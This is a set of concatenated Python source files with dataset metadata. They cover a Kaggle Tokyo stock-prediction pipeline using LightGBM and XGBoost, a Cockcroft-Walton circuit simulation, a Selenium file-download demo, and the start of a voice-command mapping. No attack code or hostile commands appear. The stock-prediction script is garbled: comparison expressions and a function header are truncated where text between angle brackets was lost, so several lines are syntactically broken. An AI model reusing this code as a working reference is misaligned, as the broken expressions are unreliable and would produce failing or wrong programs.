pd.to_datetime(train_xy.Date)\ntrain_xy['Date'] = train_xy['Date'].dt.strftime(\"%Y%m%d\").astype(int)\n'''\nfrom lightgbm import LGBMRegressor,LGBMRanker\nimport xgboost as xgb\nfrom xgboost import plot_importance\nimport matplotlib.pyplot as plt\nimport warnings,tqdm,re,copy\nwarnings.filterwarnings(\"ignore\")\ntrain_fin = pd.read_csv(\"./train_files/financials.csv\",low_memory=False) #各个季度的季度情况\ntrain_op = pd.read_csv(\"./train_files/options.csv\",low_memory=False)\ntrain_sec_pr = pd.read_csv(\"./train_files/secondary_stock_prices.csv\",low_memory=False)#.rename(columns={'RowId':'DateCode'})\ntrain_pr = pd.read_csv(\"./train_files/stock_prices.csv\",low_memory=False)\ntrain_trd = pd.read_csv(\"./train_files/trades.csv\",low_memory=False).dropna(how='any').reset_index(drop=True) #前一个交易周的市场总交易情况\n\nstock_list = pd.read_csv(\"stock_list.csv\",low_memory=False).rename(columns={'Section/Products':'Section','Close':'Close_MarketCapitalization'})\nfor f in [\"17SectorName\",\"17SectorCode\",\"33SectorName\",\"33SectorCode\"]:\n stock_list[f] = stock_list[f].apply(lambda x:np.nan if x=='-' else x.strip())\nvalid_fin = pd.read_csv(\"./supplemental_files/financials.csv\",low_memory=False) #各个季度的季度情况\nvalid_op = pd.read_csv(\"./supplemental_files/options.csv\",low_memory=False)\nvalid_sec_pr = pd.read_csv(\"./supplemental_files/secondary_stock_prices.csv\",low_memory=False)\nvalid_pr = pd.read_csv(\"./supplemental_files/stock_prices.csv\",low_memory=False)\nvalid_trd = pd.read_csv(\"./supplemental_files/trades.csv\",low_memory=False).dropna(how='any').reset_index(drop=True)\n\nSecurities_Code_L = set(train_pr[\"SecuritiesCode\"].unique().tolist() )\n\ndef reduce_mem(df): # 节约内存的一个标配函数\n starttime=time.time()\n numerics=['int16','int32','int64','float16','float32','float64']\n start_mem=df.memory_usage().sum()/1024**2\n for col in df.columns:\n col_type=df[col].dtypes\n if col_type in numerics:\n c_min=df[col].min()\n c_max=df[col].max()\n else:continue\n if pd.isnull(c_min) or pd.isnull(c_max):continue\n if str(col_type)[:3]=='int':\n if c_min>np.iinfo(np.int8).min and c_max np.iinfo(np.int16).min and c_max < np.iinfo(np.int16).max:\n df[col] = df[col].astype(np.int16)\n elif c_min > np.iinfo(np.int32).min and c_max < np.iinfo(np.int32).max:\n df[col] = df[col].astype(np.int32)\n elif c_min > np.iinfo(np.int64).min and c_max < np.iinfo(np.int64).max:\n df[col] = df[col].astype(np.int64)\n else:\n if c_min > np.finfo(np.float16).min and c_max < 
np.finfo(np.float16).max:\n df[col] = df[col].astype(np.float16)\n elif c_min > np.finfo(np.float32).min and c_max < np.finfo(np.float32).max:\n df[col] = df[col].astype(np.float32)\n else:\n df[col] = df[col].astype(np.float64)\n end_mem = df.memory_usage().sum() / 1024**2\n #print('-- Mem. usage decreased to {:5.2f} Mb ({:.1f}% reduction),time spend:{:2.2f} min'.format(end_mem,100*(start_mem-end_mem)/start_mem, (time.time()-starttime)/60))\n return df\ndef month_add(ym0,nm):\n assert len(str(ym0))==6\n ym0 = ym0 + 100*(nm//12) + nm%12 #年月+月份数 的加减法,//为向下取整\n g = int(str(ym0)[-2:])\n if g//12==1:ym0 = ym0-12+100\n return ym0\ndef process(train_fin,train_op,train_pr,train_sec_pr,train_trd ):\n for f in [train_fin,train_op,train_pr,train_sec_pr,train_trd ]:\n f['Date'] = f['Date'].apply(lambda x :int(re.sub(r'[^a-zA-Z0-9]','',x)) )\n train_pr['C*V'] = train_pr['Volume']*train_pr['Close']\n #先粘上股票信息,带入了市场部门名称,但需要注意stock表里有生效日期,如何处理?\n train_pr = train_pr.merge(stock_list[['SecuritiesCode','IssuedShares','Section','33SectorCode','17SectorCode']],how='left',on='SecuritiesCode')\n #换手率直接加,成交量/发行股份\n train_pr['Turnover'] = train_pr['Volume']/train_pr['IssuedShares']\n \n train_trd['StartDate'] = train_trd['StartDate'].apply(lambda x :int(re.sub(r'[^a-zA-Z0-9]','',x)) )\n train_trd['EndDate'] = train_trd['EndDate'].apply(lambda x :int(re.sub(r'[^a-zA-Z0-9]','',x)) )\n train_fin['CurrentFiscalYearStartDate'] = train_fin['CurrentFiscalYearStartDate'].apply(lambda x :np.nan if pd.isna(x) else int(re.sub(r'[^a-zA-Z0-9]','',x)) )\n for col in train_fin.columns:\n try:train_fin[col] = train_fin[col].apply(lambda x:np.nan if x=='-' else x).astype(np.float32) #将销售额等转换为浮点数\n except:pass\n \n #price到trade表的市场映射dict,只包含2000支股票对应三大市场\n section_dict = {'First Section (Domestic)':'Prime Market (First Section)', 'Second Section(Domestic)':'Standard Market (Second Section)', \n 'Mothers (Domestic)':'Growth Market (Mothers/JASDAQ)','JASDAQ(Standard / Domestic)':'Growth Market (Mothers/JASDAQ)',\n 'JASDAQ(Growth/Domestic)':'Growth Market (Mothers/JASDAQ)'}\n #再对市场部门名称 进行映射后与trade来merge\n train_pr['Section'] = train_pr['Section'].apply(lambda x:section_dict[x])\n\n fea_fin = ['NetSales','OperatingProfit','OrdinaryProfit','Profit','EarningsPerShare','TotalAssets','Equity','EquityToAssetRatio','BookValuePerShare','AverageNumberOfShares'] #若这些重要信息全为nan,则丢掉\n train_fin = train_fin.loc[train_fin[fea_fin].dropna(how='all').index].drop(columns=['DisclosureNumber','DisclosedDate','DateCode','DisclosedTime','DisclosedUnixTime','TypeOfDocument','CurrentPeriodEndDate','CurrentFiscalYearEndDate'])\n train_fin = train_fin.groupby(['SecuritiesCode','CurrentFiscalYearStartDate','TypeOfCurrentPeriod']).agg(\"max\").reset_index() #去重,mean可能使得文件公布日期变化\n\n #1Q就是0-2,2Q是3-5,3Q是6-8,4Q是9-11,5Q是12-14,FY则需要根据前一个判定+多少\n def process(a):\n for col in ['NetSales','OperatingProfit','OrdinaryProfit','Profit']:\n new = a[col].copy()\n a[col] = a[col]-a[col].shift(1)\n ind = a[a['TypeOfCurrentPeriod']==\"1Q\"].index\n a.loc[ind,col] = new[ind]\n a[\"CMA\"] = (a[\"TotalAssets\"]-a[\"TotalAssets\"].shift(1))/a[\"TotalAssets\"].shift(1)\n a[\"SGR\"] = (a[\"NetSales\"]-a[\"NetSales\"].shift(1))/a[\"NetSales\"].shift(1) #shift(1)是当季度-上季度/上季度\n a[\"PGR\"] = (a[\"Profit\"]-a[\"Profit\"].shift(1))/a[\"Profit\"].shift(1)\n return a\n train_fin = train_fin.groupby('SecuritiesCode').apply(lambda x:process(x) ).reset_index(drop=True)\n #只留下了销售额等重要信息\n \n #相关因子衍生\n train_fin['ROA'] = train_fin[\"Profit\"]/train_fin[\"TotalAssets\"] #资产回报率\n train_fin['RMW'] = 
train_fin[\"Profit\"]/train_fin[\"Equity\"]\n train_fin['GPM'] = train_fin[\"Profit\"]/train_fin[\"NetSales\"] #销售毛利率\n train_fin['BookValuePerShare'] = train_fin['Equity']/train_fin['AverageNumberOfShares']\n train_fin = train_fin.merge(stock_list[['SecuritiesCode','33SectorCode','33SectorName','17SectorCode','17SectorName']],how='left',on='SecuritiesCode')\n #按Date来groupby后用17SectorName来计算市场份额=\"NetSales\"/\"NetSales\"sum\n def add_sector(x):\n df = x.groupby(\"17SectorName\")[\"NetSales\"].agg(\"sum\")\n x[\"SOM\"] = x.apply(lambda x:x[\"NetSales\"]/df[x[\"17SectorName\"]], axis = 1) #市场份额\n return x\n train_fin = train_fin.groupby(['CurrentFiscalYearStartDate','TypeOfCurrentPeriod']).apply(lambda x:add_sector(x)).reset_index(drop=True)\n '''\n series = train_fin['BookValuePerShare']/(train_fin['Close']+1e-9 )\n series.rename(\"BM\",inplace=True)\n train_fin = train_fin.merge(series,left_index=True,right_index=True) #账面市值比\n series = train_fin['Close']/(train_fin['EarningsPerShare']+1e-9 )\n series.rename(\"PE\",inplace=True)\n train_fin = train_fin.merge(series,left_index=True,right_index=True) #PE\n series = train_fin['Close']/(train_fin['BookValuePerShare']+1e-9 )\n series.rename(\"PB\",inplace=True)\n train_fin = train_fin.merge(series,left_index=True,right_index=True) #PB\n series = train_fin['Close']*train_fin['AverageNumberOfShares']/(train_fin['NetSales']+1e-9 )\n series.rename(\"PS\",inplace=True)\n train_fin = train_fin.merge(series,left_index=True,right_index=True) #PS'''\n \n return train_pr,train_fin,train_trd\n\n#粘上新增的财报、市场信息\nvalid_pr,valid_fin,valid_trd = pd.concat((train_pr,valid_pr)).reset_index(drop=True),pd.concat((train_fin,valid_fin)).reset_index(drop=True),pd.concat((train_trd,valid_trd)).reset_index(drop=True)\ntrain_xy,train_fin,train_trd = process(train_fin,train_op,train_pr,train_sec_pr,train_trd )\nvalid_xy,valid_fin,valid_trd = process(valid_fin,valid_op,valid_pr,valid_sec_pr,valid_trd )\nvalid_xy = valid_xy[valid_xy[\"Date\"]>train_xy[\"Date\"].max()].reset_index(drop=True)\n#valid_xy = valid_xy[valid_xy[\"Date\"]<20220300].reset_index(drop=True)\nvalid_fin = valid_fin.sort_values(['CurrentFiscalYearStartDate','TypeOfCurrentPeriod']).drop_duplicates(['SecuritiesCode','CurrentFiscalYearStartDate','TypeOfCurrentPeriod'],keep=\"last\").reset_index(drop=True) #排序、去重\ndef recall(df,sect=True): #【总资产增长率CMA、销售增长率SGR、利润增长率PGR、资产回报率ROA、销售毛利率GPM、市场份额SOM、】\n # print(len(set(df['SecuritiesCode'].unique().tolist()) & Securities_Code_L))\n if sect==False: #没有交错\n #通过总资产选取\n Equity_P = df[df[\"Equity\"]>df[\"Equity\"].quantile([0.97])[0.97]][\"SecuritiesCode\"].unique().tolist()\n Equity_P = set(Equity_P) & Securities_Code_L\n Equity_N = df[df[\"Equity\"]df[\"TotalAssets\"].quantile([0.95])[0.95]][\"SecuritiesCode\"].unique().tolist()\n Assets_P = set(Assets_P) & Securities_Code_L\n Assets_N = df[df[\"TotalAssets\"]df[\"CMA\"].quantile([0.95])[0.95]][\"SecuritiesCode\"].unique().tolist()\n # CMA_P = set(CMA_P) & Securities_Code_L\n # CMA_N = df[df[\"CMA\"]df[\"SGR\"].quantile([0.85])[0.85]][\"SecuritiesCode\"].unique().tolist()\n # SGR_P = set(SGR_P) & Securities_Code_L\n # SGR_N = df[df[\"SGR\"]df[\"PGR\"].quantile([0.85])[0.85]][\"SecuritiesCode\"].unique().tolist()\n # PGR_P = set(PGR_P) & Securities_Code_L\n # PGR_N = df[df[\"PGR\"]df[\"ROA\"].quantile([0.9])[0.9]][\"SecuritiesCode\"].unique().tolist()\n ROA_P = set(ROA_P) & Securities_Code_L\n ROA_N = df[df[\"ROA\"]df[\"GPM\"].quantile([0.8])[0.8]][\"SecuritiesCode\"].unique().tolist()\n GPM_P = set(GPM_P) & 
Securities_Code_L\n GPM_N = df[df[\"GPM\"]df[\"SOM\"].quantile([0.85])[0.85]][\"SecuritiesCode\"].unique().tolist()\n SOM_P = set(SOM_P) & Securities_Code_L\n SOM_N = df[df[\"SOM\"] float:\n def _calc_spread_return_per_day(df, portfolio_size, toprank_weight_ratio):\n #weights=[2,1]之间的200个点,计算前200个的purchase,后200个的short\n weights = np.linspace(start=toprank_weight_ratio, stop=1, num=portfolio_size)\n purchase = (df.sort_values(by=\"Rank\")['Target'][:portfolio_size] * weights).sum() / weights.mean()\n short = (df.sort_values(by=\"Rank\", ascending=False)['Target'][:portfolio_size] * weights).sum() / weights.mean()\n return purchase - short\n\n buf = df.groupby('Date').apply(_calc_spread_return_per_day, portfolio_size, toprank_weight_ratio)\n if df['Date'].nunique()==1:sharpe_ratio = buf.values[0]\n else:sharpe_ratio = buf.mean() / (1e-9+buf.std())\n return sharpe_ratio\ndef custom_loss(y_true,y_pred): #提前按Date来groupby并排序好,存下类似g_train之类的数据,然后按g_train数目进行loss计算\n #把pred按g_train分好组\n mmax = g_train.max()\n exp_y = np.exp(y_pred)\n #先做 exp_y 对应的mask表求分母下的sum,上三角\n mask0 = []\n for i in range(len(g_train)):\n g_ = g_train[:i].sum()\n tmp = exp_y[g_:g_+g_train[i]]\n mask0 += np.triu(np.meshgrid(tmp,tmp)[0] ).sum(axis=1).tolist() #保留上三角\n mask0 = np.array(mask0)\n grad,hess = [],[]\n for i in range(len(g_train)):\n g_ = g_train[:i].sum()\n tmp = mask0[g_:g_+g_train[i]]\n tmp = np.meshgrid(tmp,tmp)[0]\n tmp = np.divide(exp_y[g_:g_+g_train[i]].reshape(-1,1),tmp )\n tmp = np.tril(tmp) #保留下三角\n grad += tmp.sum(axis=1).tolist()\n tmp = tmp-tmp**2\n hess += tmp.sum(axis=1).tolist()\n grad = np.array(grad)-1\n hess = np.array(hess)\n return grad,hess\ndef add_rank(x,ranks):\n x = x.sort_values(by=\"Prediction\", ascending=False)\n x['Rank'] = range(ranks,ranks+x.shape[0])\n return x\ndef custom_lgb_eval(y_true, y_pred): #仅用一天的来早停\n T,Y = pd.DataFrame(data=y_true,columns=[\"Target\"]),pd.DataFrame(data=y_pred,columns=[\"Prediction\"])\n TY = pd.concat((T,Y),axis=1)\n TY[\"Date\"] = 0\n for i in range(len(g_eval)-1):TY.loc[ g_eval[:i+1].sum():g_eval[:i+2].sum() ,\"Date\"]=i+1\n TY = TY[[\"Date\",\"Prediction\",\"Target\"]].groupby(\"Date\").apply(lambda x:add_rank(x,0) ).reset_index(drop=True)\n score = calc_spread_return_sharpe(TY, 200, 2)\n return 'sharp_ratio',score, True\ndef evaluation_valid(valid_xy,model):\n df_P_L1 = valid_xy[valid_xy[\"SecuritiesCode\"].apply(lambda x:x in P_L)].reset_index(drop=True)\n df_P_L1[\"Prediction\"] = model.predict( df_P_L1.drop(columns=[\"Date\",\"SecuritiesCode\",\"Section\",\"Target\"]+[f\"Target{i}\" for i in range(seq-1)]).values,num_iteration=model.best_iteration_ ) #lgb换xgb需要改此处以及,ntree_limit = model.best_ntree_limit\n df_P_L1 = df_P_L1[[\"Date\",\"Prediction\",\"Target\"]].groupby(\"Date\").apply(lambda x:add_rank(x,0) ).reset_index(drop=True)\n df_N_L1 = valid_xy[valid_xy[\"SecuritiesCode\"].apply(lambda x:x in N_L)].reset_index(drop=True)\n df_N_L1[\"Prediction\"] = model.predict( df_N_L1.drop(columns=[\"Date\",\"SecuritiesCode\",\"Section\",\"Target\"]+[f\"Target{i}\" for i in range(seq-1)]).values,num_iteration=model.best_iteration_ ) #,num_iteration=model.best_iteration_\n df_N_L1 = df_N_L1[[\"Date\",\"Prediction\",\"Target\"]].groupby(\"Date\").apply(lambda x:add_rank(x,len(P_L)+1) ).reset_index(drop=True)\n valid_ = pd.concat((df_P_L1,df_N_L1)).reset_index(drop=True)\n score = calc_spread_return_sharpe(valid_, 200, 2)\n return score\ndef custom_xgb_eval(pred,dtrain):\n T,Y = dtrain.get_label(),pred\n T,Y = 
pd.DataFrame(data=T,columns=[\"Target\"]),pd.DataFrame(data=Y,columns=[\"Prediction\"])\n TY = pd.concat((T,Y),axis=1)\n TY[\"Date\"] = 0\n for i in range(len(g_eval)-1):TY.loc[ g_eval[:i+1].sum():g_eval[:i+2].sum() ,\"Date\"]=i+1\n TY = TY[[\"Date\",\"Prediction\",\"Target\"]].groupby(\"Date\").apply(lambda x:add_rank(x,0) ).reset_index(drop=True)\n score = calc_spread_return_sharpe(TY, 200, 2)\n return 'sharp_ratio',score\n\ntrain_x,train_y = train_xy.drop(columns=[\"Date\",\"SecuritiesCode\",\"Section\",\"Target\"]+[f\"Target{i}\" for i in range(seq-1)]),train_xy[\"Target\"]\n'''\nparams = {\n 'booster': 'gbtree', 'objective': 'reg:squarederror', #reg:squarederror rank:ndcg\n #'eval_metric': ['logloss','auc'],\n 'gamma': 1, 'min_child_weight': 3, 'max_depth': 8, 'learning_rate': 0.01, 'lambda': 1, 'alpha': 1,\n 'subsample': 0.7, 'colsample_bytree': 0.7, 'colsample_bylevel': 0.7, 'eta': 0.05, #0.05-0.3\n 'tree_method': 'exact', 'seed': random_seed, 'nthread': 48, \"silent\": True\n }\nwatchlist = [( xgb.DMatrix(valid_xy.drop(columns=[\"Date\",\"SecuritiesCode\",\"Target\"]).values, label=valid_xy[\"Target\"].values), 'eval')]\nmodel = xgb.train( params, xgb.DMatrix(train_x.values, label=train_y.values), evals=watchlist,feval=custom_xgb_eval,maximize=True , num_boost_round=1000, early_stopping_rounds=500, verbose_eval=20)\nprint(\"\\n\".join((\"%s: %.2f\" % x) for x in list(sorted( model.get_fscore().items(),key=lambda x:x[1],reverse=False)) ))\nprint(\"最优迭代步:\",model.best_iteration,model.best_ntree_limit, model.best_score)\nmodel.save_model(f\"xgb_model{random_seed}.model\") #model = xgb.Booster(model_file=\"xgb_model{random_seed}.model\")但此时得xgb.DMatrix()\nfig,ax = plt.subplots(figsize=(15,15))\nplot_importance(model, height=0.5, ax=ax, max_num_features=32)\nplt.show()\nscore = evaluation_valid(valid_xy,model)\nprint(\"valid_score:\",score)\n'''\n\n\n#先对userid排序后,即可传入从开头到后面每隔多少个数据进行rank的损失限定\n#此处则按Date进行排序,然后每个传入2000支股票即可\n#model = LGBMRanker(boosting_type='gbdt',objective='lambdarank', num_leaves=512, n_estimators=5000, reg_alpha=0.1, reg_lambda=0.1, max_depth=8, subsample=0.7, colsample_bytree=0.7, subsample_freq=1,\n# learning_rate=0.01, min_child_weight=30, random_state=random_seed, n_jobs=-1)\n#model.fit(train_x,train_y, group=g_train, eval_set=[watchlist], eval_group=[g_eval], eval_metric = custom_lgb_eval, early_stopping_rounds=2000, verbose=20)\n\nwatchlist = (valid_xy.drop(columns=[\"Date\",\"SecuritiesCode\",\"Section\",\"Target\"]+[f\"Target{i}\" for i in range(seq-1)]).values, valid_xy[\"Target\"].values) #[valid_xy['Date']==lastday-1]\n#custom_loss 'rmse'\nmodel = LGBMRegressor(num_leaves=128,num_iterations = 1000,learning_rate=0.01,objective = 'mse' ,metric='custom', verbose=-1, lambda_l1=1,lambda_l2=1,min_child_weight=30,random_state=random_seed,n_jobs=48 )\nmodel.fit(train_x,train_y, eval_set=watchlist ,eval_metric = custom_lgb_eval, early_stopping_rounds=1000,verbose=20)\nprint(\"最优迭代步:\",model.best_iteration_, model.best_score_)\nscore = evaluation_valid(valid_xy,model)\nprint(\"valid_score:\",score)\njoblib.dump(model,f\"lgb_model{random_seed}.pkl\") #model=LGBMRegressor() model=joblib.load(f\"lgb_model{random_seed}.pkl\")\n\nfea_ = model.feature_importances_\nfea_name = train_x.columns.tolist()\nfea_name,fea_ = zip(*sorted(zip(fea_name,fea_), key=lambda x:x[1],reverse = True)) #默认,reverse = False升序\nprint(\"特征重要程度排序:\\n\",list(zip(fea_name[:50],fea_[:50])) )\nimport matplotlib.pyplot as plt\nplt.figure(figsize=(10,10))\nplt.barh(fea_name,fea_,height 
=0.5)\nplt.show()\n\n\nprint(\"总耗时min:\",(time.time()-time_now)/60)\n","repo_name":"WaJun-Code/mygit","sub_path":"AI/kaggle_JPX_Tokyo_Stock_Exchange_Prediction/boost_main.py","file_name":"boost_main.py","file_ext":"py","file_size_in_byte":29233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73147853162","text":"# !/usr/bin/env python3\n# -*- coding_ctrl: utf-8 -*-\n\n# ------------------------------------- #\n# Created by: JOaO PEDRO PETERS BARBOSA #\n# & MATHEUS SENE PAULO #\n# #\n# email: joao.peters@engenharia.ufjf.br #\n# & matheus.sene@engenharia.ufjf.br #\n# #\n# Date: Jul/2021 #\n# ------------------------------------- #\n\n\n\"\"\"\nDisciplina [210081] - Tecnicas de Simulacao de Conversores Estaticos\n\nCircuito de Cockcroft-Walton\n\nAplicacao da modelagem PWL no diodo, e metodo de integracao trapezoidal.\n\nBaseado em material disponibilizado pelo professor.\n\nProf.: Pedro Gomes Barbosa\n\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport sys\n\n# ------------------------------ #\n# Elementos Passivos do Circuito #\n# R = 12 # (Ohms)\nC = 500e-6 # (Farad)\n\n# -------------------- #\n# Fonte de Alimentacao #\nvS = 127 # (Vrms)\nf = 60 # (Hertz)\nw = 2 * np.pi * f # (rad/s)\nT = 1 / f # (seg)\n\n# ----------------------- #\n# Parametros de Simulacao #\nt0 = 0 # valor inicial\ntn = 0.2 # valor final\ndeltaT = 100e-6 # passo de simulacao\n\ntempo1 = np.arange(t0, tn+deltaT, deltaT) # tempo de simulacao\nnptos = tempo1.shape[0] # total de pontos simulado\n\nt_ant = 0 # tempo anterior (t - deltaT)\ntol = 1e-3 # tolerancia de convergencia\n\n# ----------------------------------------------- #\n# Matriz Nodal Modificada (MNM) e Vetores Solucao #\n# MNM = np.zeros((3, 3))\nMNM_var = np.zeros((4, 4))\nMNM_cte = np.zeros((4, 4))\n\nvi = np.zeros((4, 1)) # vetor solucao: v1, v2, v3 & iS\nJE_k = np.zeros((4, 1)) # Contribuicoes fonte de corrente\n\nvi_ant = vi # vetor solucao anterior\nvk_ant = vi\n\n# ---------------------- #\n# Modelagem PWL do diodo #\nRd0 = 1e6\nRd1 = 10e-3\n\nGd0 = 1 / Rd0\nGd1 = 1 / Rd1\nGc = (2 * C) / deltaT\n\nvD = 0.7\ni0 = 0\n\nb = (Gd1 + Gd0) / 2\ncj = (Gd1 - Gd0) / 2\na = i0 - (cj * np.abs(vD))\n\n# ------------------------------- #\n# Variaveis de saida da simulacao #\nout_v1 = [0]\nout_v2 = [0]\nout_v3 = [0]\nout_iS = [0]\nJc2_ant2 = 0 \nJc1_ant2 = 0 \nid1_vet = [0]\nid2_vet = [0]\nflag = 'TPZ'\npassos = 0 \ntempo= [0]\nt = 1\nGd1_vet=[0]\nGd2_vet=[0]\n\n # MNM constante \nMNM_cte[0][0] = + Gc # c1: 1->2\nMNM_cte[1][0] = - Gc # :\nMNM_cte[0][1] = - Gc # :\nMNM_cte[1][1] = + Gc # :\nMNM_cte[2][2] = + Gc # c2: 3->gr\nMNM_cte[3][0] = + 1 # vS: 1->gr\nMNM_cte[0][3] = + 1 # : \n# ----------------- #\n# Loop de simulacao #\nwhile t < nptos:\n cont_d = 0\n errok = np.ones((4, 1)) # armazena erros\n\n vc1_ant = + vi_ant[0][0] - vi_ant[1][0] # v1 - v2\n vc2_ant = + vi_ant[2][0] \n\n if flag == 'TPZ':\n\n t_k = (deltaT * t)\n tempo.append(t_k)\n # --------------- #\n # fonte de tensao #\n vs_k = np.sqrt(2) * vS * np.sin((w * t_k) + np.pi)\n \n ic1_ant = Gc * vc1_ant - Jc1_ant2\n Jc1_ant = + (Gc * vc1_ant) + ic1_ant # ic + ic_ant -> tpz\n Jc1_ant2 = Jc1_ant\n\n ic2_ant = Gc * vc2_ant - Jc2_ant2\n Jc2_ant = + (Gc * vc2_ant) + ic2_ant # ic + ic_ant -> tpz\n Jc2_ant2 = Jc2_ant\n\n if flag == 'BE':\n\n t_k = t_k + (deltaT/2)\n tempo.append(t_k)\n # --------------- #\n # fonte de tensao #\n vs_k = np.sqrt(2) * vS * np.sin((w * t_k) + np.pi)\n \n Jc1_ant = + (Gc * vc1_ant) \n 
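# BE branch: the companion current sources are rebuilt from Gc*v only, since backward Euler keeps no history-current term (unlike the trapezoidal branch above)\r\n 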
Jc1_ant2 = Jc1_ant\n\n Jc2_ant = + (Gc * vc2_ant) \n Jc2_ant2 = Jc2_ant\n\n passos -= 1 \n \n # ------------------- #\n # Modelagem PWL diodo #\n\n while np.max(np.abs(errok)) > tol:\n print(t, cont_d)\n\n # ------------------------------------------------ #\n # Analise de tensao e fonte de corrente do diodo 1 #\n vd1_ant = - vk_ant[1][0] # -v2\n Gd1 = b + (cj * np.sign(vd1_ant - vD))\n \n id1 = a + (b * vd1_ant) + (cj * np.abs(vd1_ant - vD)) \n Jd1 = id1 - (vd1_ant * Gd1)\n # ------------------------------------------------ #\n # Analise de tensao e fonte de corrente do diodo 2 #\n vd2_ant = vk_ant[1][0] - vk_ant[2][0] # v2 - v3\n Gd2 = b + (cj * np.sign(vd2_ant - vD))\n \n id2 = a + (b * vd2_ant) + (cj * np.abs(vd2_ant - vD))\n #id2_vet.append(id2)\n Jd2 = id2 - (vd2_ant * Gd2) \n\n # -------------------------------- #\n # Matriz Nodal Modificada variavel #\n MNM_var[1][1] = + Gd1 + Gd2 # d1: 2->gr || d2:2->3\n MNM_var[1][2] = - Gd2 # :\n MNM_var[2][1] = - Gd2 # :\n MNM_var[2][2] = + Gd2 # :\n\n invMNM = np.linalg.inv(MNM_cte + MNM_var) # MNM invertida\n\n # ----------------------------- #\n # Vetor de Fontes Independentes #\n JE_k[0][0] = + Jc1_ant\n JE_k[1][0] = + Jd1 - Jd2 - Jc1_ant\n JE_k[2][0] = + Jd2 + Jc2_ant\n JE_k[3][0] = + vs_k\n\n # -------------------------- #\n # Calculo das tensoes nodais #\n vi = np.dot(invMNM, JE_k)\n \n cont_d = cont_d + 1\n errok = (vi - vk_ant) #vk_ant roda no loop iterativo\n vk_ant = vi \n\n Gd1_vet.append(Gd1)\n Gd2_vet.append(Gd2)\n #id1_vet.append(id1) \n #id2_vet.append(id2)\n \n d = (vi[3][0] - vi_ant[3][0])/deltaT\n\n #if ( (Gd1_vet[t] != Gd1_vet[t-1] or Gd2_vet[t] != Gd2_vet[t-1]) and flag == 'TPZ'): \n if ( np.abs(d) > 20e3 and flag == 'TPZ'):\n flag = 'BE'\n passos = 2\n nptos += 2\n tempo.pop(t)\n Gd1_vet.pop(t)\n Gd2_vet.pop(t)\n t = t - 1 \n vk_ant = vi_ant \n t_k = t_k - deltaT\n \n else: \n vi_ant = vi\n out_v1.append(vi[0][0])\n out_v2.append(vi[1][0])\n out_v3.append(vi[2][0])\n out_iS.append(vi[3][0])\n t += 1\n\n if passos == 0 and flag == 'BE': \n flag='TPZ'\n #t = t - 1 \n\n\nplt.figure()\nplt.plot(tempo, out_v1, label=\"Tensao Fonte\", color=\"red\")\nplt.plot(tempo, out_v2, label=\"Tensao N2\", color=\"lightgreen\")\nplt.plot(tempo, out_v3, label=\"Tensao N3\", color=\"darkgreen\")\nplt.plot(tempo, out_iS, label=\"Corrente Fonte\", color=\"grey\")\n\nplt.xlabel(\"Tempo de Simulacao (seg)\", fontsize=12)\nplt.ylabel(\"Amplitude [V] & [A]\", fontsize=12)\nplt.legend(frameon=True, facecolor=\"white\", edgecolor=\"white\")\nplt.grid()\n\n\n# FIGURA 2 #\nplt.figure()\nplt.plot(tempo, out_iS, label=\"Corrente Fonte\", color=\"grey\")\nplt.xlabel(\"Tempo de Simulacao (seg)\", fontsize=12)\nplt.ylabel(\"Amplitude [A]\", fontsize=12)\nplt.legend(frameon=True, facecolor=\"white\", edgecolor=\"white\")\nplt.grid()\n\n\nplt.show()\n\n\n\n","repo_name":"joaoppeters/linear_circuits_modeling","sub_path":"cockcroft_walton/cockcroft_walton/CockcroftWalton_pt1CDA.py","file_name":"CockcroftWalton_pt1CDA.py","file_ext":"py","file_size_in_byte":6540,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23914552373","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nimport time\r\nfp=webdriver.FirefoxProfile()\r\nfp.set_preference(\"browser.helperApps.neverAsk.saveToDisk\", \"text/plain,application/pdf\") #mime type\r\nfp.set_preference(\"browser.download.manager.showWhenStarting\", False)\r\nfp.set_preference(\"browser.download.dir\", 
\"C:\\BIGFIX\")\r\nfp.set_preference(\"browser.download.folderList\", 2);\r\nfp.set_preference(\"pdfjs.disabled\", True)\r\n\r\n\r\ndriver=webdriver.Firefox(executable_path=\"C:\\Projects\\Automation\\Drivers\\geckodriver.exe\",\r\n firefox_profile=fp)\r\n\r\ndriver.get(\"http://demo.automationtesting.in/FileDownload.html\")\r\n\r\n#download the text file\r\ntextArea1=driver.find_element_by_id(\"textbox\").send_keys(\"this is my fine text file testing!!!\")\r\ndriver.find_element_by_id(\"createTxt\").click() #click on the 1st button to GENERATE the link\r\ndriver.find_element_by_id(\"link-to-download\").click()#downlat the file after clicking on the LINK\r\n\r\n#quit\r\ndriver.quit()","repo_name":"IdanErgaz/Pytest","sub_path":"downloadFileInFF.py","file_name":"downloadFileInFF.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1267536426","text":"# this file has all the commands and mapping that the voice recognizer is able to pick up and do some action\n\nfrom _constants import MSFT_ACCOUNT_NAME_LIST\n\n# this list contains all the details about a command\nCOMMAND_DETAILS: dict = {\n 1: {\n \"method_name\": \"trigger_pipeline_run\",\n \"description\": \"Triggering Azure DevOps pipeline\",\n \"success_message\": \"Successfully triggered pipeline build\",\n \"failure_message\": \"Failed to trigger build pipeline\",\n \"add_args\": False,\n \"args\": [],\n \"kargs\": {},\n \"speak_args\": True,\n },\n 2: {\n \"method_name\": \"create_requirement_file\",\n \"description\": \"create the requirements.txt file\",\n \"args\": [\"pip freeze > requirements.txt\"],\n \"kargs\": {},\n \"success_message\": \"Successfully created requirements file\",\n \"failure_message\": \"Failed to create requirements file\",\n \"add_args\": False,\n \"speak_args\": True,\n },\n 3: {\n \"method_name\": \"get_total_pipeline_runs\",\n \"description\": \"get all pipeline runs count\",\n \"success_message\": \"There are a total of {} pipeline runs\",\n \"failure_message\": \"Failed to get the pipeline runs\",\n \"add_args\": False,\n \"speak_args\": True,\n \"args\": [],\n \"kargs\": {},\n },\n 4: {\n \"method_name\": \"call_on_teams\",\n \"description\": \"call someone on teams\",\n \"add_args\": True,\n \"args\": [],\n \"kargs\": {},\n },\n 5: {\n \"method_name\": \"open_mail\",\n \"description\": \"mail someone on Outlook\",\n \"add_args\": True,\n \"args\": [],\n \"kargs\": {},\n },\n 6: {\n \"method_name\": 